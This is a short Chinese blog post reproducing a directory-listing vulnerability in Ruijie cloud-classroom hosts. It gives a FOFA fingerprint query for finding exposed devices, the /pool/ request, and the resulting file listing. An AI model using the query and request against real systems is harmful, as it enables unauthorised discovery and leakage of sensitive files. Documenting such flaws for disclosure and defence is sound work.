锐捷 云课堂主机 pool 目录遍历漏洞 2022-04-09 | 漏洞复现 | | | 147 漏洞描述 i ⭐锐捷云课堂主机存在目录遍历漏洞,通过访问get请求/pool/,即可读取目录.导致敏感信息泄露. 漏洞影响 s ✅锐捷云课堂 空间测绘 d ⭕FOFA:title="Ruijie" && "云课堂主机" 漏洞复现 ✅访问 http://1.1.1.1/pool目录遍历 12345678Directory Listing For /Filename Size Last Modified Packages.gz 490.8 kb Fri, 26 May 2017 00:22:32 GMT extra/ Fri, 26 May 2017 00:22:33 GMT main/ Fri, 26 May 2017 00:22:33 GMT Apache Tomcat/6.0.24 个人博客 孤桜懶契:https://gylq.gitee.io/time 本文标题:锐捷 云课堂主机 pool 目录遍历漏洞 文章作者:孤桜懶契 发布时间:2022年04月09日 - 08:26:57 最后更新:2022年05月24日 - 21:00:57 原始链接:http://gylq.gitee.io/time/posts/17.html 许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。 -------------------本文结束 感谢您的阅读------------------- 坚持原创技术分享,感谢您的支持和鼓励! 打赏 微信支付 支付宝